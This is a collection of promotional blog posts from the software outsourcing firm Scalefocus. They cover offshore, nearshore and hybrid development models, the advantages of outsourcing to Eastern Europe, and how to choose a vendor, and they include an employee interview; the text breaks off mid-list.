Search Results

Table of contents What is offshore software development? Who should use offshore software development? Offshore outsourcing regions: Where to look? How to choose the right offshore development center? Conclusion Key Takeaways: Get started with offshore software development to accelerate your business operations Offshore software development offers a wide-range of benefits for big and small businesses Convenient time zone and cost optimization are only some of the incentives What is offshore software development? Offshore software development is the practice of passing your software development to an external company in an offshore location. There’s no doubt the fast-developing global economy is increasingly looking towards technology in order to maintain scalability and to stay competitive. But with an accelerating market in some developed regions around the world, businesses run the risk of falling behind, unless they take some of their operations outside their own domain. What does this mean? To put it simply, large-scale businesses and emerging startups alike are readily outsourcing their operations to offshore development centers. The ability to hand your operations to a strategic offshore partner gives you the freedom to stay at the helm while a dedicated team of experts takes care of the heavy-lifting. In other words, you leverage technology to a level that allows you to continuously scale your business. Not only that, but you get a whole new crew of specialists all with a mission to deliver the best service you could possibly get. So, what exactly is offshore software development? Essentially, offshore software development is the outsourcing of a company’s software development to an external party. This party could be called a strategic partner, a service provider, or a development center. The main goal of this development center is to carry out your services, take care of products, or even run a specific part of your business for you. Who should use offshore software development? Virtually every company can take advantage of offshore software development. There are, however, certain factors that could suggest one company might need offshore software development more than another. These factors include: With this in mind, universities and private institutions prepare thousands of individuals each year, ready to go into the job market and put their knowledge to work. Mathematics, physics, engineering, and computer programming are among the sciences with high-level of concentration among young people in the education system in Eastern Europe. 1. Inability to keep up with accelerating technology If your core business is non-technical, it is likely you could be lacking key resources to scale in the digital era. To this end, you might consider looking into an offshore development center that could transform your brand. Such partner could position your business into the ever-changing world of technology. A dedicated team could alleviate key technical responsibilities such as maintaining hardware resources and making sure all operations run smoothly. 2. Lack of expertise in software development The other side of the leap to digital transformation is software. On that front, a team of experts could be hired specifically to make sure your website and social media channels are well optimized and full of relevant content. More importantly, software development teams will bring fresh ideas, rich toolkit to help create digital presence, and much more. Even if a company has already formed an in-house team, they may lack the competencies to scale up and take on bigger contracts. Looking to an offshore software development center will definitely help increase the capabilities of the company. 3. Need to optimize cost Cost optimization is among the leading factors you may need to find an offshore partner and offload the burden of software development. New developers in your local region may be expensive or hard to find. In contrast, an offshore development center in Eastern Europe, for example, could give you high quality service at a fraction of the cost. Moreover, development teams could be hired full-time and work in rotating shifts, thus making sure support is secured at all times. 4. No time to develop and build out in-house operations Outsourcing your software development to an offshore partner could speed up development time. And timing in today’s fast-paced market environment is crucial if you want to be noticed. In that sense, reducing time to market is certainly among your priorities if you want to meet the sky-high demands of customers but also to stay ahead of the competition. This said, it’s critical to have a team that could readily deploy a variety of strategies fuelled by robust hardware and secure software. 5. Need to maintain flexibility Companies that outsource their software development often work on a contractual basis. This allows them to stay flexible and focused on one project at a time. In other words, there is no need to hire permanent staff. Whether you meet some, or all, of the above criteria, you should consider the opportunities offshore software development could bring to your daily business operations. In more detail, by allowing an offshore software development center to handle part of your operations, you get to reap a flurry of benefits. In addition, you might also consider nearshore development, which would imply your location is near to the location of the service provider. Best offshore outsourcing regions Some of the best offshore outsourcing regions include: For many businesses that operate in the US or Western Europe, an attractive offshore and nearshore region is Eastern Europe. Its location is convenient for both the US and countries in Western Europe for several reasons. On the one hand, US companies get the benefit of extended business hours. In other words, the time zone difference makes it easy for a US company to have around-the-clock technical and customer support. On the other hand, Western European countries may want constant, real-time collaboration and nearshore areas are a neat solution. How to choose the right offshore development center? There is a myriad of software development companies around the world. Therefore, it’s highly important for you to know how to pick the best one for your business. To this end, be sure to make some considerations that will make it easy for you to choose. 1. Developer Location Eastern Europe, Asia, India are all preferred locations for offshore development centers. Countries in the former Eastern bloc, now part of the European Union, like Bulgaria, are packed with specialists and outsourcing companies positioned well in the market. 2. Expertise, Skills and Competencies Ideally, you would want to have experienced professionals managing your business. In this light, the offshore company should demonstrate competence, have desirable reputation, and good history of successful projects with solid partnerships. 3. Company Security Policies Make sure to choose a company that will comply with international policies, regulations, and security standards. This will guarantee you your data will be safe and you will not be exposed to risks and vulnerabilities. Conclusions Offshore development centers can be your gateway to business growth and scalability. In practice, offshore software development might be everything you need to get your project up and running. For our part, Scalefocus is a leading development center well-positioned for both offshore and onshore software development. Moreover, we have solid experience in designing tailored-fit software solutions for a wide array of businesses. From large enterprise customers to startups ready to take off, our clients have trusted us to set up offshore delivery centers with exceptional automation test engineers and self-sustainable teams, working closely with onshore management. Contact us now to find out how we can scale your business and help your company reach new heights.

Table of contents Software development outsourcing models: - Offshore - Nearshore - Onshore - Hybrid How to choose the best software development company: - Research - Technology - Strategy Selecting custom software development companies to collaborate with can be an arduous process. Making the correct decision is crucial as it can easily make or break a project. So how do you find the partners that meet your requirements and help your business excel? What are the main criteria, and how far do you search if in-house development has already proved to be high maintenance? Here's a list of the pros and cons of all the location-based outsourcing models and how they can help save money, drive results, and choose the best custom software development company for your business. Offshore Software Development Outsourcing According to the data platform Statista, IT outsourcing is projected to generate revenue of almost 400 billion USD in 2022 or 9.5% more than 2021, and the share of service providers based overseas is rapidly growing. So, to bring our point home, we will start from the furthest. Indeed, different time zones can be challenging as meetings are harder to organize, which might result in fragmented communication. However, the global pandemic and related remote work tendencies have refuted the concept that smooth business processes are inconceivable without the geographical proximity of teams. Furthermore, there is the crucial advantage of extended business coverage as the digitalization of everyday life makes round-the-clock customer support and real-time communication a necessity. Access to a formidable talent pool to tap into is another reason to opt in favor of a remote software development company. The quality of tech education in areas such as Eastern Europe allows cherry-picking from a wide variety of software engineers, project managers, UI/UX analysts/designers, etc. And working with top professionals leads to greater agility and flexibility, which is imperative in today’s ever-changing business landscape. Still, it comes as no surprise that cost reduction is by far the main objective, as 70 percent of the entrepreneurs who have participated in a recent Deloitte survey would confirm. It is crucial for any outsourcing project, and the lower cost of living in overseas territories means the upward trend for offshore software development is here to stay. Not to mention that lower prices also give the ability to scale up and down and maintain a truly effective business model. Nearshore Software Development Outsourcing Hiring in neighboring countries also has its advantages, and the similarity in time zones makes communication easier and business processes smoother. It is undoubtedly so in EU members like Bulgaria, Romania, and Croatia, where legislation and regulations are comparable to their western neighbors’, plus travel and transportation are visa-free. While not as cost-effective as offshore outsourcing, it still comes at a lower price than in the US, UK, or Western Europe. Furthermore, the quality of delivery is very likely to be higher than in Asia, Africa, or Latin America, so nearshore outsourcing is an option worth exploring. Customers save time, therefore money, because better quality execution minimizes the risk of finding mistakes later in the project and having to rewrite code or start from scratch. Temporarily recruiting a neutral third party with experience in the vendor market is also an option, as they can act as mediators, provide operational support from the start until the partnership has become fully functional. Onshore Software Development Outsourcing Outsourcing within the same country would naturally go with shared time zones, language, culture, and work ethic. Familiarity with local legislation and tax policies is another factor that is hard to ignore, and physical colocation makes for a closer business-to-customer relationship. As with nearshore development, though, identical time zones mean extended business coverage comes at a higher price for round-the-clock support. And, speaking of pricing, the high standard of living in developed countries makes this model the least cost-effective, which is also its critical disadvantage. Hybrid Outsourcing It is not uncommon for businesses to keep their management onshore and outsource the technical teams overseas. While not exactly the best of both worlds, the combination of smooth communication within your native country and the cost reduction an offshore development center would provide is a viable solution. This business model might prove challenging, though, and its efficiency is highly dependent on the management team and their ability to remotely oversee and structure operations related to the entire Software Development Life Cycle. Research potential vendors Once you have chosen the best-suited outsourcing model for your enterprise, you will need to gain profound knowledge of the custom software development companies in the selected region. Invest resources in online research and get familiar with your potential partners’ work. Check for similarities with your own project and their expertise in your field. Contact their former and current clients and gather as much feedback as possible. Portfolios are helpful, but they tend to be a bit biased and one-sided, while testimonials by actual partners are more likely to tell the whole story, provide behind-the-scenes details and valuable insights. Check their ratings and reviews at clutch.co or other specialized websites. Contact local recruiters as their deeper understanding of the market might prove priceless and provide further criteria to base your decision on. Technology The technical aspects of collaboration with outsourced service providers are also pivotal for any project’s cost efficiency and agility. That is why your organization’s CTO needs to monitor the selection of a software development company, the technology stack at their disposal, and the whole negotiation process. Access to the latest coding languages and top-of-the-line development and project management tools is a must. It guarantees excellent product quality and accelerates time to market. Data, AI, ML, Custom software development, and Cloud transformation solutions should be instrumental to the outsourcing strategy and transaction processes in order to simplify the infrastructure and achieve better scalability. Cyber security remains paramount, so software prevention of cyberattacks and compromised data is a prerequisite for any new cooperation. Strategy At the end of the selection process and before entering the negotiation phase, your company will have to define its objectives and priorities. Are you scaling the development capacity in the short or long term, and what is being outsourced – a single app or a sizeable project? A comprehensive strategy will clearly communicate your product vision statement to the development unit. Prepare accurate technical documentation to ensure all parties involved are on the same page at every step of the project. Define tasks volume and timeline for all deliverables within the Scope of Work. This will provide the development team with a detailed overview. Specify your budget and communicate it to your potential partners. Transparency and efficient communication are at the core of successful cooperation and help set everyone’s goals and prerogatives. Conclusions Choosing a custom software development company as a long-term service provider is a complex task, but finding the right fit will definitely take your projects to another level. Cost-effective and agile customized solutions are only possible if you work with top professionals and state-of-the-art technology. They are also the main reason the Scalefocus remote development centers collaborate with numerous companies worldwide. We are looking forward to hearing from you and helping your business, too, so do not hesitate to contact us!

Table of contents Software Development Outsourcing: Key Advantages Eastern Europe: A Preferred Outsourcing Destination Reasons to Outsource Software Development in Eastern Europe Global recognition and high-quality services Key Takeaways: Outsourcing partners in Eastern Europe offer numerous benefits for software development The region boasts a rich talent pool, quality of work, around-the-clock support, and more Software Development Outsourcing Offers Key Advantages Choosing a destination to outsource your software development can be a challenging task, regardless of the size of your business. In doing so, you have to make sure all uncertainties such as a language barrier and time zones, have been dealt with. So, what are some of the best software development outsourcing places? No matter if you’re a large-scale enterprise or a startup company, the digital era has most likely prompted you to look for IT solutions that will help your business expand. This said, an increasing number of companies find it more beneficial to go beyond their native country and seek an offshore outsourcing partner. To illustrate, the quickly-growing IT outsourcing industry is now valued at roughly $400 billion, website Statista says. Eastern Europe: A Preferred Outsourcing Destination To outsource software development, rather than hire in-house personnel, has its key advantages. For example, it guarantees better quality and cost optimizations. These benefits become even larger when you pick an offshore destination like Eastern Europe. The outsourcing services market in Eastern Europe has advanced substantially over the past few decades. As a result, private businesses and big public companies have flocked to the area, drawn by the many benefits and opportunities. Countries in Eastern Europe command a high-percentage of educated and skilled people working in the IT outsourcing industry. In addition, there is a high level of English proficiency, which is crucial to maintaining effective business relationships. Among other factors, there is also the cost optimization part, which some businesses might put as a number one priority when seeking an offshore partner. Let’s dive in and provide more details into the many benefits of outsourcing software development to Eastern Europe. Reasons to Outsource Software Development in Eastern Europe 1. Educated people looking to put their knowledge to work Eastern Europe can brag with a high percentage of educated and knowledgeable people, especially in tech-related fields. Education in the Balkan countries, for example, is relatively low-cost compared to that of Western Europe. With this in mind, universities and private institutions prepare thousands of individuals each year, ready to go into the job market and put their knowledge to work. Mathematics, physics, engineering, and computer programming are among the sciences with high-level of concentration among young people in the education system in Eastern Europe. 2. High proficiency in English for smooth communication It’s fair to say English is on a high-level among working professionals in Eastern Europe. Moreover, those employed in the technology sector are fluent in English as well as other European languages. The ability to communicate with your business partner without any language barrier is key when it comes to productivity, efficiency, and high-quality work. Moreover, sharing the same language is crucial to forming strong and long-lasting relationships with partners in different regions. 3. A rich pool of experienced tech professionals The high level of tech-related education has naturally led to people going into the workforce and looking for opportunities to get hands-on experience. To this end, Eastern Europe has many local businesses and big tech companies that are quick to scoop up talents from the market. As a result, the technology sector has been running ahead of the general economy. In other words, businesses are eager to acquire specialists from the region due to their rich knowledge and potential for growth. Furthermore, the IT industries across Eastern Europe have been advancing at such a rapid rate that their economies are failing to keep up. 4. Convenient location and time zone for offshore outsourcing Another key advantage of outsourcing to Eastern Europe is the convenient geographical location and suitable time zone for offshore outsourcing. Both Western European countries and the US choose the region for its location and positioning on the map. Travel and deliveries from Western Europe can take as little as a few hours. With the US, on the other hand, travel time can take longer but direct connections are certainly helpful. Time zone in Eastern Europe is ideal for many businesses. The time difference with countries from Western Europe is about one or two hours on average. For the US, time zones can differ by about seven to ten hours. This time difference allows for implementing extended business coverage. In other words, having an offshore partner in Eastern Europe offers you around-the-clock customer and tech support. 5. Robust data privacy and security Data privacy and security in Eastern Europe is guaranteed by the same norms and rules that apply to the rest of Europe. This means your offshore development partner will abide by Europe-wide copyright laws, non-disclosure agreements, and other policies, including the General Data Protection Regulation (GDPR). 6. Cost-effective partnerships and business relations Last, but certainly not least, the Eastern European area is sought after for its attractive compensations for developers, engineers and other IT-focused workers. Outsourcing software development companies in the region will allow you to optimize cost without reducing the quality of work. Eastern Europe maintains its high-level of IT-related outsourcing for rates significantly lower than the average compensation of a developer in Western Europe or the US. That means businesses who choose to outsource their development center to Eastern Europe will end up saving big on cost optimization. This is made possible due to the relatively lower levels of economic progress in the area, compared with Western Europe. Global recognition and high-quality services With the above in mind, Eastern Europe has become an outstanding region for companies looking to outsource software development. Countries in the area offer a balanced approach to high-quality services, underpinned by cost-effective business relationships. In conclusion, Eastern Europe has been globally recognized as a software outsourcing region that offers a rich pool of technical specialists. Quality of work, multilingual environment, and emphasis on data security are only some of the reasons you might want to turn to Eastern Europe. Chances are, you will find a suitable offshore partner to take your business on another level. Scalefocus, a large-scale software development company, offers a wide-range of products and services aimed to help you grow your business. Our solutions are carefully tailored to meet even the most sophisticated demands. Contact us today, we’d love to hear about your business and develop the best possible way for you to expand.

Offshore software development companies have been thriving in the last couple of decades, and it comes as no surprise. The increased demand for online and mobile solutions, caused by the pandemic and millions of people confined to remote work, has altered the IT landscape. According to McKinsey, companies from all industries have already accelerated their digitalization processes by three to four years. One has to keep an eye on new possibilities to evolve, and judging by the statistics, the most advanced technology markets globally, including the United States, the United Kingdom, and Western Europe, have certainly had theirs open. But what makes the remote development centers so popular, and how do you find the right partner? First of all, cooperation with offshore software development companies provides cost reduction that is very hard to ignore. The hourly rate of software developers in Eastern European countries is 2 to 3 times lower than in the USA or the western parts of the same continent. A similar ratio applies to office rent, tax, IT infrastructure, HR services, and most other overhead expenses. And then you have legal advisors’ fees, vacations, healthcare, and insurance benefits; you do the math. Indeed, different time zones can be viewed as inconvenient in terms of communication, as Eastern Europe is 7 to 10 hours ahead of the USA. However, budget-wise, this is a significant advantage since you can employ customer support to do the costly American nightshifts at local daytime and reasonable rates. While offshore outsourcing in Asia is considered more economical and covers even wider time zones, it is also true that working conditions there can be below par. Cultural differences might prove harder to surmount, too, resulting in slower software development processes or worse quality products. Another reason for IT outsourcing is access to a much broader talent pool. Most top-shelf software developers stateside have already been recruited by leading tech enterprises and are not actively looking for new jobs. As a result, it will cost a fortune to lure them away from their lucrative remuneration packages. An offshore development center provides all the personnel you need as a complete, functioning unit from the get-go: accomplished software engineers, project managers, testers, UI/UX analysts and designers, etc. Time to market is crucial when it comes to cutting-edge technology as competition is fierce and trends change at breakneck speed. A skillful and experienced remote team would have the quality and agility, as well as access to the latest development tools and programming languages that might turn out to be your competitive advantage. And the acceleration of processes will inevitably lead to increased productivity and a wider variety of products, services, updates, and upgrades, which will expand your portfolio. Scalability is also a significant factor for a successful business strategy, and remote software development centers give the flexibility to plug in and out whole units or individuals whenever your company needs to scale up or down. The in-house recruitment process can be much more rigid in this respect, and even experienced HR departments find that challenging. So, there are plenty of offshore development centers to choose from, but how do you select the most beneficial overseas partner? Being spoilt for choice might be a problem, but it is a nice problem to have. Once your business goals have been defined, the choice is there to be made, and you have to start somewhere. Pick a destination – cost savings, time zones, and cultural similarities are all part of an equation where each detail matters. For example, some Eastern European countries, including Bulgaria, Romania, and Poland, are EU members and subject to EU legislation, making laws and regulations regarding overseas investment more transparent. Furthermore, the quality of tech education in the area is impressive, which means access to a formidable talent pool. Do your research – look up your potential partners’ portfolios and make sure they include similar projects to yours. They need to have the necessary experience and a deep understanding of your business model as it results in smoother communication and processes. Do not hesitate to get their former or current collaborators’ lowdown on the particular cooperation, especially if you have worked with or have connections to any of the companies included in the portfolio. Referrals might be a turning point in your decision-making process, so all advice is precious. Pay attention to all seemingly insignificant details as they might snowball out of control in the context of your own business. Then dig even deeper – check what ratings the leading software providers have at specialized websites such as Clutch, Deloitte, etc. Social media, LinkedIn, conferences, and tech marketplaces are other opportunities to aggregate a substantial database of talent and contacts to base your selection on. Getting in touch with recruiters with comprehensive knowledge of the local market will also provide valuable insights you might not find online. Clearly define the technical aspects of the project with your technology partners or co-founders and make sure they are involved in each step of the selection and negotiation process. Profound expertise is a must when communicating your business concept, evaluating the required skill set, and creating contract agreements and job descriptions. Non-disclosure agreements, superb project management tools, operating systems, and access to the latest code also need to be prerequisites for the project’s inception. Last but not least, as vital as cost efficiency is, beware of quotes that seem too attractive to pass up. Expenses can skyrocket at a later stage if quality has been compromised and code needs to be fixed or rewritten from scratch, not to mention further investments in software maintenance and adjustments and the waste of valuable time. In conclusion – outsourcing services seem to be the way ahead for many industries, and IT is no exception. Offshore software development centers offer solutions that are more effective budget-wise and provide companies with extra scalability, flexibility, and agility, so they have more resources left to invest in their core businesses. Naturally, there are challenges to be faced, and geographical distance, foreign regulations, and cultural differences can prove hard to overcome. Still, a wise selection of overseas partners and sensible business processing will ensure the benefits far outstrip all the hurdles en route. For the past ten years, Scalefocus has been chosen by companies of all nationalities and sizes (from small start-ups to Fortune 500 caliber) to develop and maintain their software. Immaculate project management and world-class software engineers are just two of the reasons, and you can contact us to discover more.

Hey, this is our People of Scale series. Here’s something new - a blitz interview between (as the headlines says) our youngest and the most experienced teammates at Scalefocus. Believe it or not they’ are from the same office. This week on focus we have Daniel Joskovski & Filip Naumovski Present yourself using only 5 words On his background Location? Daniel: Skopje, North Macedonia Filip: Skopje, North Macedonia Status? Daniel: Senior father of two and Senior Software Support Engineer Filip: Trying to finish college while contributing and learning as much as possible at work. Education? Daniel: Drop out after 48 university exams. Consider himself a regular student even though he was an employee of the Mechanical Engineering Faculty. Filip: I am currently in my fourth year at the Faculty of Electrical Engineering and Information Technologies – UKIM, Skopje. Hoping to graduate sometime this coming summer. How did you start your career? Daniel: I’ve started as a support of the IT laboratory at my university and worked there for 5 years. After I’ve left, I started my own business and been doing that till 2014. Filip: With a couple of internships in several companies, my current position at Scalefocus is the first real job I've had. On his role at Scalefocus Why Scalefocus? Daniel: It’s simple. When the pandemic struck, I wanted a job that could be done remotely. And the “Work from everywhere” opportunity by Scalefocus came just in time. So, I took it, and here I am. There is a funny story about my job application. A team member from HR called me and asked if I wanted to apply for a position at Scalefocus. And I was surprised because I’ve already applied and sent a CV. But HR said that instead of a CV, I had sent them an invoice, and the file is with my name. So, the mistake was correct, and after some time, instead of an invoice, I got my first paycheck by Scalefocus. Filip: To me, Scalefocus is both a company that kickstarted my career and one where I feel like I can advance both in position and responsibilities, but also skills, technical and soft included, all the while having a real impact. Tell us about your position. Daniel: Currently, I am the most senior support engineer in the ACC team. As it turns out, I am the most senior employee of the company too. As I am working on a few projects, I have some people who help me, and I am satisfied with my position. I am confident because it allows me to learn about new technologies. Before I’ve started working for Scalefocus, I had no idea about Jira, WordPress and so on, and now they are a big part of my everyday work. I just had to adapt to evolve. Filip: As part of the ACC team, most of my time is spent working on bug fixes or change requests (in AngularJS, Angular and Java Spring Boot). Still, I am currently in the process of transferring over to the Frontend department of Scalefocus. Now share how you would explain to your grandma what you do for a living. Daniel: Oh, it’s not easy at all. For example, my father has 2 universities degrees. And even though he is a technically educated person, he still does not understand how something that is not physical has such a significant impact. Filip: I type things on my keyboard, and magic happens on the screen. On his everyday work life What are the qualities of a successful team or project leader? Daniel: The essence is to have knowledge about project management. The most important thing is to know how to do the job and the second one is experience. And e pinch of charisma would help too. If someone lacks the first two but wants to be a leader, they will not succeed. For example, SCRAM is extremely popular to build a product, but unfortunately, not all project managers understand that framework. The methodology is not critical. What matters is the knowledge of how to lead the process. Filip: I would say someone that recognizes the team members and their respective strengths and weaknesses. Tell us about your team & colleagues? Daniel: Even though we are working remotely, we are still a team, and I enjoy working with the people around me. They are educated people doing their best and have significant input on the projects. Filip: The only thing I can say is that they have made my time in ACC very enjoyable and stress-free. Every single one of them is wonderful, and they are all delightful to be within both work-related and casual settings. What makes you proud and confident about your work? Daniel: I can somehow always come up with the best decision not only about problem-solving but generally in life. Everything becomes clear and simple if you think enough about it. Filip: Getting a positive response from a customer is always a good sign, but just getting something to work, especially from a development point of view, is on its own a very satisfying experience. On his updates How do you keep your technology and programming skills current so that you can do your job well? Daniel: As I’ve already said, I am a curious guy, and I have the skillset to learn quickly. So, when life challenges me, I can adapt. I am a Microsoft Certified Trainer for .NET, MS SQL Server, and SharePoint for the past 20 years. I’ve been in situations where I must teach in front of a group and have a week to learn everything from scratch about the topic, I am about to present to them. Filip: I try to keep up with new technologies as much as possible because, especially in web development, it seems like there's a hot new framework every other month. I'd say I keep my skillset current mainly through small personal projects in technologies that interest me or are needed for my position at work. Are you an early adopter or do you prefer to be patient? Daniel: With that said - you already know the answer. Filip: I like trying out new technologies and seeing what they offer, so I guess an early adopter. On his goals What do you want to achieve? Career-wise and not only. Daniel: Here is another story. Some years ago, I wanted to stop working because the market in North Macedonia was not challenging enough, and it did not motivate me. So, I needed something to push me. That was when I bought some land by the seaside in Croatia. And that was enough to get back my motivation. I want to renovate the house there and someday take care of my olive gardens. I want to prepare this estate for when I retire. This personal project affects my work performance, and I use it as an engine. Career-wise I hope to stay in my position until it’s time for retirement because the prominent positions do not tempt me. I don’t strive to be a General manager, you know - I’ve already been there. I just like to do what I am good at. Filip: Imagining myself in a few years, I'd like to have a broad knowledge of multiple technologies and be adaptable to any environment or project as needed, contributing and having a real impact. What do you want to say to your future self? Daniel: Every part of our lives has its beauty and challenges. I wouldn’t say I like to overthink the future. I just enjoy the present. Filip: I wouldn't ask anything because it's no fun if I know what awaits me! On his challenges What is the most challenging/exciting thing about your work? Daniel: The most challenging thing is solving problems or creating solutions, but it is also exciting. When you solve someone’s problem, it could be really satisfying. Filip: Probably implementing new features from scratch, start to finish. It's always interesting to see how features or projects evolve from idea to blueprint, code, and finally to working product. How do you think technology advances will impact your job? Daniel: I am open to the news and advances. The main project I work on is based on Jira core, its automation of business processes. The ability to automate every business process in a brief time for me is an excellent thing. And when there are improvements, I will be able to build better solutions. Filip: There is a significant impact, especially in our line of work, since technology advances are so rapid. As a result, we must be flexible and adaptable to whatever new technology might be popular at the time. What skills or characteristics make someone an effective remote worker? Daniel: A bit more self-discipline and good time management are needed. Everything else should stay as if we are at the office. I’ve noticed that I do more stuff at home than at the office. It’s because I don’t waste time on transport or trying to find a parking spot, or deciding on what I should wear today. I invest all this time in my projects. Another benefit of “Work from Everywhere” is that it motivates you when you switch your home and go to the villa or the seaside. The change of the atmosphere has a positive effect. Filip: I think good, clear communication is essential in a remote work environment. Most of our communication is asynchronous, through mails or chats, so asking the right questions and answering in a clear, detailed manner is a vital skill that could significantly lower the time spent communicating and leave more time for actual development. On his favourites What is your favorite practice at Scalefocus? Daniel: I won’t lie if I say everything. The work-life balance is something that I really appreciate. Also, the possibility to do my job without sacrificing my free time is significant. It gives freedom. Filip: How well organized everything is, from infrastructure to teams to everything else. How do you manage your work-life balance? Daniel: It’s not hard if you know your priorities. I know that I should do my assignment for today and contribute to my long-term projects. Everything works out perfectly if I do that and keep the phase. Filip: Working remotely makes an excellent work-life balance easier to achieve, and the flexible hours at Scalefocus help a lot with that. Music, hobbies, family, pets, and everything in between - who are you outside Scalefocus? Daniel: Outside of work, I am an easygoing person that enjoys social contacts. Unfortunately, the pandemic affected this side of our life. I love to travel. I used to do it a lot with my motorbike, but 3 years ago I had an accident and my shoulder needed to heal. But hopefully, soon I’ll be on my motorbike again. Besides that, I regularly go to the mountains for hiking and long walks. Since my kids are grown up, I still have the urge to take care of something, so that’s why I have two dogs - Pomeranians and they’re motivating me to go out and move more. Filip: Regarding music, I'm definitely not someone that listens to a particular genre. I just listen to what sounds good to me, from pop to metal to folk. I spend a lot of my free time gaming, both casually and competitively (formerly on European Dota 2 leaderboards). On the best advice A piece of advice for Filip? Daniel: He is a good developer. So, my advice for him would be to stay on this track, and everything will be fine. It’s a job for life - look at me, I am 59 and still doing it side by side with him - the youngest in our company. I wish him to prosper and get the position he wants - a manager when he is ready. A piece of advice for Daniel? Filip: Not really advice, just that I hope he doesn't mind us consulting with him constantly about things he has more experience with What practices would you “steal” from him? Daniel: Unfortunately, I can’t steal his youth :) Filip: How adamant he is about all the work that we do (and issues that we might run into) being adequately documented and communicated with the client.

Thinking about hiring a software developer but you aren't sure whether to outsource? The  outsourcing software development trend  continues to rise with the industry valued at $108 billion in 2021. From management to cloud services, businesses see the benefits of hiring developers outside of their own talent pool. However, some still voice concerns about using a third-party team. This article examines the pros and cons of in-house vs outsourcing software development. Learn about the different development roles that you need to consider. Discover the meaning of onshore, nearshore, and offshore outsourcing. See why outsourcing offers multiple opportunities outside of traditional set-ups. Read on to learn why outsourcing your applications could save you time and money over in-house methods. What Is Software Development? Software development is the act of creating and maintaining a software application. Applications cover a wide range of uses from operating systems to phone apps to cloud services and websites. Developing any successful app relies on following the software development life cycle (SDLC). The SDLC is an international standard that software developers follow when building applications. Steps include: Identifying needs through market research Analysing requirements Design and development Testing Deployment and maintenance Part of the lifecycle includes a review and maintenance step that continues the cycle until the app is no longer needed. That means that the team you use to build the app must be available to fix bugs, etc. Hiring the wrong team for short-term goals will lead to long-term failures. Types of Software Software applications usually fall into three categories: system, application, and programming languages. In today's connected world, Internet connectivity is a given. Most modern apps on a smartphone not only work in isolation but connect online to save and download data. Applications should work on different platforms including Progressive Web Apps and hybrid apps. As consumer choice expands, so should the reach of the software. Software Development Roles A development team consists of valuable members who all contribute to the creation and maintenance of software. A computer programmer writes, modifies, and debugs code. A QA or Quality Assurance manager ensures the projects meet the highest of standards. A database administrator monitors and improves the backend database infrastructure. Software Development Manager Outside of the core coding and development are the project managers. Their role is to oversee the development lifecycle and liaise between the client and the team. Project management is key to creating and implementing an application. For example, Scalefocus hires only the best project managers to communicate with our clients. They act as the bridge to pass feedback and ensure that requirements are met at all times. What Is an In-House Software Developer? Traditional software development took place in-house or on the company's premises. Team members hired through a recruitment process became part of the payroll. They worked within the physical building owned or leased by the company. And they were managed by in-house personnel. That model is slowly eroding due to the availability and quality of outsourcing. But what does that entail and should you hire software developers that you don't have direct control over? Outsourcing Software Development Outsourcing simply means hiring a third party to undertake a project. With the advent of high-speed global communications, outsourcing is now a mainstream option. Even in-house developers no longer work on a company's premises due to the pandemic. Onshore and Nearshore and Offshore Options There are several outsourcing models to choose from: Onshore - hire software developers within the same country Nearshore - outsourcing to a neighbouring region Offshore - hiring a development team in another nation Hybrid - a combination of the above Some businesses choose onshore options when they consider the potential barriers when outsourcing. Different time zones and language issues can cause concern so they select a team that is close by. However,  nearshore outsourcing can solve many of those issues. A neighbouring country can recruit team members at a lower cost. They are fluent in multiple languages and can offer extra resources. The same goes for offshore outsourcing. A hybrid option can mix different teams and is a viable solution depending on how it's managed. Pros and Cons of In-House Development In-house development provides a perceived level of control and security when developing software. Businesses can manage team members directly if their workforce resides in the same premises. There are fewer cultural barriers and you can hire individual experts to carry out specific work. Yet, hiring an in-house team comes at a cost. Interviewing suitable candidates, producing onboarding materials, and tending to sick leave is expensive. Once the candidate becomes embedded within the team, they're managed by an in-house manager. That person has to go through the same process at additional expense. The price of hiring the best team is set to rise by 22% over the next several years. It's an up-front investment that you're tied to moving forward. One wrong personnel decision will push deadlines back as you need to recruit. That is if you can find the right person from a diminishing talent pool Pros and Cons of Outsourcing Outsourcing to a third party like Scalefocus will save you time, money, and hassle in the short to long term. For example, when developing for a clinical solutions provider we reduced costs by 40%. Quality did not suffer as we were able to produce more QA tests than their in-house team. We also have a larger talent pool with a wide range of expertise. Need a UI expert? We have UI and UX designers that tailor-make solutions. Require data processing and DWH? Our business intelligence staff offers consultancy and database architecture. A fully-qualified member fluent in your cultural sensitivities will manage your project. We have offices in Europe and Washington DC and work remotely for the best outcomes. The only disadvantage to outsourcing custom software development is the perceived stigma. Once you speak to our team you'll discover that those barriers don't actually exist. Fullstack Software Development Solutions Outsourcing software development brings lower expenses and a wider pool of specialised talent. Although in-house teams have some advantages those benefits greatly diminish over time. Scalefocus offers digital development solutions to a global client base since 2012. Whether it's  strategy and advice  or application coding and testing, we want to be your primary team. Fortune 500 companies, as well as start-ups, rely on Scalefocus to develop and maintain their software. Contact us today  to discover why.

Table of contents 10 benefits of IT outsourcing Cost reduction Broad talent pool Scalability Shared responsibility Time to market Flexibility Modern technology Extended business coverage Tax benefits Location 10 benefits of IT outsourcing The IT outsourcing market is expected to be worth nearly $400 billion by 2025, according to Business Wire. But what are the reasons behind the mighty rise of the remote software development center, and is it that beneficial to relocate selected business processes offshore? Indeed, 70 percent of the surveyed enterprises that have chosen to employ development teams abroad consider cost reduction to be at the root of their decision. Flexibility at 40% and speed to market at 20% are also deemed significant as they complete the top 3. And then there is agility and access to tools and processes not too further down the chart. Statistics don’t lie, and various factors motivate IT businesses to look overseas for solutions in their pursuit of digital transformation and staying relevant in the competitive and rapidly evolving world of modern technology. 1. Cost Reduction In-house software development requires constant onboarding, staff augmentation, and ridiculous expenses for qualified personnel, IT infrastructure, and HR services. Add the rent of vast office spaces plus social insurance taxes and healthcare insurance for hundreds of employees, and you get the whole picture. It costs an arm and a leg, and it is high maintenance, so no wonder companies would rather save energy and resources for their core competencies and concentrate on what their business is essentially about. 2. Rich Talent Pool An offshore development center could easily guarantee the same or even higher quality of execution for an optimized budget due to the lower cost of living in particular regions of the world. Established local enterprises have full access to a much broader talent pool and top pros with a proven track record. Software engineers, project managers, UI and UX analysts and designers, content creators, sales and marketing specialists, QA staff – you name it, they have it. 3. Scalability Scalability is one of the significant challenges for most companies, as any HR department can confirm, and an offshore provider gives the flexibility to scale up and down when necessary. Remote teams also help explore potential new markets and destinations that might prove a wise investment for the future expansion of your core business. 4. Shared Costs and Risks Another massive competitive advantage is that most operational costs of the remote development center, including resources, technology, and infrastructure, will be the external partners’ responsibility, too. These are typically precalculated and included in your contract agreement. Even if dealing with companies that are based thousands of miles away might seem risky, it usually works the other way around – such cooperation will bring an experienced business partner to share the risks with and hold accountable for fulfilling deliverables and KPIs. Of course, one 